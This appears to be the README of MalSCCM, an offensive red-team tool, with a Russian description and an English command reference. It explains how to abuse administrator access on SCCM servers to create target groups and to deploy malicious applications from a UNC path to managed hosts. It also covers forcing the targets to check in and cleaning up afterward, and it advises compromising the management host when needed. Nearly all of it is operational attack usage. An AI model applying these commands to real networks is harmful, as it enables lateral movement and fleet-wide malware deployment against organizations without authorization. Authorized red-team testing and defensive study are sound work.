
Используйте серверы SCCM для развертывания вредоносных приложений на управляемых хостах с целью латерального перемещения и операций красных команд.
Этот инструмент позволяет злоупотреблять локальными или удаленными серверами SCCM для развертывания вредоносных приложений на управляемых ими хостах. Для использования этого инструмента ваш текущий процесс должен иметь права администратора на сервере SCCM.
Обычно при развертывании SCCM сервер управления и первичный сервер находятся на одном хосте, и в этом случае хост, возвращенный командой locate, можно использовать в качестве первичного сервера.
Если это не так, вам потребуется скомпрометировать хост управления, возвращенный командой locate, чтобы затем снова запустить locate на этом хосте и получить имя первичного сервера. Как только у вас будет это имя и доступ администратора, вы готовы к работе!
Для получения дополнительной информации об использовании инструмента обратитесь к блогу ниже.
Огромная благодарность PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM), на котором все это основано; эта работа была бы невозможна без трудов @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.
Commands listed below have optional parameters in <>.
Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate
Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>